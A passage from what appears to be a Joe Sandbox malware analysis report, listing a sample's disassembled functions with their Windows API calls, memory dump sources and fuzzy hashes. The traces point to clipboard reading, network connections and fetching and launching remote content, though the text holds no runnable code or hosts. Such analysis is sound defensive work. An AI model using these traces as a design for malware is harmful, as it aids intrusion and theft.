                                                                    • CloseHandle.KERNEL32(00000000), ref: 10002A00
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000262C,00000000,00000000,00000000), ref: 10002A26
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: 83d9a5acb80fea125ccfb2012910954748ebf1ccbb30d9e4ee0d7e62ea42ef5d
                                                                    • Instruction ID: 8e95c2826898587ef7ccda52250b5cb9b2d76626100f07937a606723e6195a85
                                                                    • Opcode Fuzzy Hash: 83d9a5acb80fea125ccfb2012910954748ebf1ccbb30d9e4ee0d7e62ea42ef5d
                                                                    • Instruction Fuzzy Hash: AD113AB550025DBFFB00DFA4DCC4CAA7BECEB452E47168126F905C6265DB31DD808BA0
                                                                    Function 00412618 Relevance: 10.7, APIs: 7, Instructions: 183librarystringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041264D
                                                                    • memset.MSVCRT ref: 00412660
                                                                    • memset.MSVCRT ref: 0041266E
                                                                    • LoadLibraryA.KERNEL32(100140CC,?,?,?,?,?,?,?,00000104,00000000), ref: 0041267B
                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00412834
                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,00000104,00000000), ref: 00412858
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$Library$FreeLoadlstrcpy
                                                                    • String ID:
                                                                    • API String ID: 3185261140-0
                                                                    • Opcode ID: 0ffad9cd750d37a4f8673343d1f702e8677341e97ff82641447f6cf9ec524642
                                                                    • Instruction ID: 99cbbd0a13abc2d66761d7bdabc70822120ec9568554f5a589967dca830a500d
                                                                    • Opcode Fuzzy Hash: 0ffad9cd750d37a4f8673343d1f702e8677341e97ff82641447f6cf9ec524642
                                                                    • Instruction Fuzzy Hash: B361F87190025DABDF21EFA1CD84EEFBBB9FB08304F1001AAF915E2150D7759EA58B64
                                                                    Function 0040D70E Relevance: 10.6, APIs: 7, Instructions: 98filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000170), ref: 0040D72A
                                                                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0040D75D
                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040D780
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040D792
                                                                    • strlen.MSVCRT ref: 0040D79F
                                                                    • wsprintfA.USER32 ref: 0040D7C3
                                                                    • lstrcpy.KERNEL32(?,?), ref: 0040D7DC
                                                                      • Part of subcall function 0040D51B: memset.MSVCRT ref: 0040D537
                                                                      • Part of subcall function 0040D51B: strlen.MSVCRT ref: 0040D57E
                                                                      • Part of subcall function 0040D51B: memset.MSVCRT ref: 0040D5E4
                                                                      • Part of subcall function 0040D51B: wsprintfA.USER32 ref: 0040D5FC
                                                                      • Part of subcall function 0040D51B: memset.MSVCRT ref: 0040D60B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$Filestrlenwsprintf$CloseCreateHandleWritelstrcpymemcpy
                                                                    • String ID:
                                                                    • API String ID: 1942971391-0
                                                                    • Opcode ID: d13039a4b9e5cc068fceb6d55ee45ef0f6c190212da61e3b15bc8a86ec381b56
                                                                    • Instruction ID: 47e53453467552c116f620483278b5e9df91a522f88cc874ad7efcd27dae7bb0
                                                                    • Opcode Fuzzy Hash: d13039a4b9e5cc068fceb6d55ee45ef0f6c190212da61e3b15bc8a86ec381b56
                                                                    • Instruction Fuzzy Hash: AA31507390421CAAEB20DBE4CC89FDB776C9B09354F1041B7F619F21C1EA759E898B64
                                                                    Function 00409A8F Relevance: 10.6, APIs: 7, Instructions: 85networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409E60: setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00409E85
                                                                      • Part of subcall function 00409E60: CancelIo.KERNEL32(?,?,?,?,00409A9F), ref: 00409E8E
                                                                      • Part of subcall function 00409E60: InterlockedExchange.KERNEL32(?,00000000), ref: 00409E9A
                                                                      • Part of subcall function 00409E60: closesocket.WS2_32(?), ref: 00409EA3
                                                                      • Part of subcall function 00409E60: SetEvent.KERNEL32(?,?,?,?,00409A9F), ref: 00409EAC
                                                                    • ResetEvent.KERNEL32(?), ref: 00409AA2
                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00409AB3
                                                                    • gethostbyname.WS2_32(?), ref: 00409AC4
                                                                    • htons.WS2_32(?), ref: 00409AD9
                                                                    • connect.WS2_32(?,00000002,00000010), ref: 00409AF6
                                                                    • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 00409B1B
                                                                    • WSAIoctl.WS2_32(0000000C,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 00409B4C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Eventsetsockopt$CancelExchangeInterlockedIoctlResetclosesocketconnectgethostbynamehtonssocket
                                                                    • String ID:
                                                                    • API String ID: 4281462294-0
                                                                    • Opcode ID: 932793c469b544b11e4b241f13170b231aa34aa6681c2130a40818cef7a9eba3
                                                                    • Instruction ID: 65c3a029619327615ef4a9c2bdadc02f42618da053e5281480e2fccca2ba9e06
                                                                    • Opcode Fuzzy Hash: 932793c469b544b11e4b241f13170b231aa34aa6681c2130a40818cef7a9eba3
                                                                    • Instruction Fuzzy Hash: 1B218171500318BFEB109FA5CC85EEBBBBDEF08364F00452AF201A62E1D7B59D448B64
                                                                    Function 1000896B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileA.KERNEL32(10009BAE,40000000,00000002,00000000,00000004,00000080,00000000,Rsjshd fzfgkqcm,00000104,00000000), ref: 100089A1
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 100089BA
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 100089C2
                                                                    • WriteFile.KERNEL32(10009BAE,?,00000400,?,00000000), ref: 10008A38
                                                                    • CloseHandle.KERNEL32(10009BAE), ref: 10008A49
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandlePointerSizeWrite
                                                                    • String ID: Rsjshd fzfgkqcm
                                                                    • API String ID: 1886887421-3753134293
                                                                    • Opcode ID: 7968883ead0f57cd96c7908dc12ccf6293502afa04708cabb66c95fa5f9433b7
                                                                    • Instruction ID: 4666eb284188271ef756a82573d973c6ea2c4ab6db8dc4beb41906ae3c0cabb2
                                                                    • Opcode Fuzzy Hash: 7968883ead0f57cd96c7908dc12ccf6293502afa04708cabb66c95fa5f9433b7
                                                                    • Instruction Fuzzy Hash: 3C21C171900218FFFB119F68CCC4AED7BB9EB857C1F10816AFB41A6185C7304E468B55
                                                                    Function 0040DB2B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72processstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 0040DB34
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 0040DB48
                                                                    • memcpy.MSVCRT(00000000,?,00000001,00000001), ref: 0040DB54
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040DBBB
                                                                      • Part of subcall function 0040D9EE: LoadLibraryA.KERNEL32(100120D8), ref: 0040DA12
                                                                      • Part of subcall function 0040D9EE: FreeLibrary.KERNEL32(00000000), ref: 0040DA61
                                                                      • Part of subcall function 00412479: GetFileAttributesA.KERNEL32(00000001,0040DB7C,00000001), ref: 0041247D
                                                                      • Part of subcall function 00412479: GetLastError.KERNEL32 ref: 00412488
                                                                    • CreateProcessA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0040DBAC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$??2@??3@AttributesCreateErrorFileFreeLastLoadProcessmemcpystrlen
                                                                    • String ID: D
                                                                    • API String ID: 3530698900-2746444292
                                                                    • Opcode ID: 671067e8ef1846a81141077b585d28d48d3980d5da1a1c07d8c56620a32c1c03
                                                                    • Instruction ID: 02d6abb6fce6944c4b7c04b381117456e553187659861697214afee7e54a008d
                                                                    • Opcode Fuzzy Hash: 671067e8ef1846a81141077b585d28d48d3980d5da1a1c07d8c56620a32c1c03
                                                                    • Instruction Fuzzy Hash: 080126B79012253ADB20A7E59D01DDF77ACDF04365F10003BFA01F6182DAFC995982E8
                                                                    Function 10005ADF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72processstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 10005AE8
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 10005AFC
                                                                    • memcpy.MSVCRT(00000000,?,00000001,00000001), ref: 10005B08
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10005B6F
                                                                      • Part of subcall function 100059A2: LoadLibraryA.KERNEL32(wininet.dll), ref: 100059C6
                                                                      • Part of subcall function 100059A2: GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 100059DD
                                                                      • Part of subcall function 100059A2: GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 100059F7
                                                                      • Part of subcall function 100059A2: FreeLibrary.KERNEL32(00000000), ref: 10005A15
                                                                      • Part of subcall function 1000A42D: GetFileAttributesA.KERNEL32(00000000,100085D6,00000000,00000000,00000000,00000000,00000000), ref: 1000A431
                                                                      • Part of subcall function 1000A42D: GetLastError.KERNEL32 ref: 1000A43C
                                                                    • CreateProcessA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10005B60
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryProc$??2@??3@AttributesCreateErrorFileFreeLastLoadProcessmemcpystrlen
                                                                    • String ID: D
                                                                    • API String ID: 2949623759-2746444292
                                                                    • Opcode ID: 5ae1b94510a511eda72d5278b9c3c8a50a08dfaae0961b767033f1b904b2bcce
                                                                    • Instruction ID: fe7e7c0f1c56155753b8301587afb5697dd4fc049ed3447b233ad6c2bb2c0619
                                                                    • Opcode Fuzzy Hash: 5ae1b94510a511eda72d5278b9c3c8a50a08dfaae0961b767033f1b904b2bcce
                                                                    • Instruction Fuzzy Hash: 7D01087B5011193AFB10E7F49C01EDF7BACDF053E2F104422FA02E604ADA75A94582E4
                                                                    Function 10001392 Relevance: 10.6, APIs: 7, Instructions: 51clipboardstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenClipboard.USER32(00000000), ref: 1000139D
                                                                    • GetClipboardData.USER32(00000001), ref: 100013AB
                                                                    • GlobalLock.KERNEL32(00000000), ref: 100013B4
                                                                    • strlen.MSVCRT ref: 100013D3
                                                                      • Part of subcall function 10006A0B: __EH_prolog.LIBCMT ref: 10006A10
                                                                    • strlen.MSVCRT ref: 100013EA
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 100013FB
                                                                    • CloseClipboard.USER32 ref: 10001401
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Clipboard$Globalstrlen$CloseDataH_prologLockOpenUnlock
                                                                    • String ID:
                                                                    • API String ID: 2744405493-0
                                                                    • Opcode ID: 431c511c13b840a3db696b2f14f29e5d82c71d5b19571c36cace1f1c5bce8b68
                                                                    • Instruction ID: 0d69faf70a3d8d0b1f9fb98979244c8c41cae3c491574e9400629f2eb81f589b
                                                                    • Opcode Fuzzy Hash: 431c511c13b840a3db696b2f14f29e5d82c71d5b19571c36cace1f1c5bce8b68
                                                                    • Instruction Fuzzy Hash: 0901677550121DAFF702EBA48D85DDF77BDDF053D1B110025F902B6156DA709E4187B1
                                                                    Function 0040EDBE Relevance: 9.1, APIs: 6, Instructions: 106libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(10012D70,00000000,?,?,?,?,?,0040EB9D), ref: 0040EDE4
                                                                    • GetProcAddress.KERNEL32(00000000,10012D60), ref: 0040EDF3
                                                                    • LoadLibraryA.KERNEL32(00000050,?,?,?,0040EB9D), ref: 0040EE2D
                                                                    • realloc.MSVCRT ref: 0040EE4C
                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040EEA5
                                                                    • FreeLibrary.KERNEL32(?,0040EB9D), ref: 0040EEE7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressLoadProc$Freerealloc
                                                                    • String ID:
                                                                    • API String ID: 343009874-0
                                                                    • Opcode ID: 9edfece79cba95e15e08a13c92d70f32224e10f3ea16ca1e90f40b87946399e3
                                                                    • Instruction ID: f72afefb7c63cd39f7642bb3109670bc8e6506643f2206df3884020aa8ac5276
                                                                    • Opcode Fuzzy Hash: 9edfece79cba95e15e08a13c92d70f32224e10f3ea16ca1e90f40b87946399e3
                                                                    • Instruction Fuzzy Hash: 6641FB71A0021DEBEB20CF66C844BAABBB4FF04355F14847AE905E7391D738E961CB95
                                                                    Function 0040C4DC Relevance: 9.1, APIs: 6, Instructions: 67networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle_mbscpygethostbynameinet_addrinet_ntoamemcpy
                                                                    • String ID:
                                                                    • API String ID: 2639091341-0
                                                                    • Opcode ID: 1b43a32b92d413965a47735dddaf79fe86748fd417147d91aadcece4ea53af1b
                                                                    • Instruction ID: 78cc4d16ba7b9287d4f33b0f295d69ec33110f1f458ade282100471c26657cab
                                                                    • Opcode Fuzzy Hash: 1b43a32b92d413965a47735dddaf79fe86748fd417147d91aadcece4ea53af1b
                                                                    • Instruction Fuzzy Hash: ED114FB5500229BFEB009F64DCC4CAB3BECEB443A87158536F904D7261D774DD848BA4
                                                                    Function 0040A48B Relevance: 9.1, APIs: 6, Instructions: 67networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
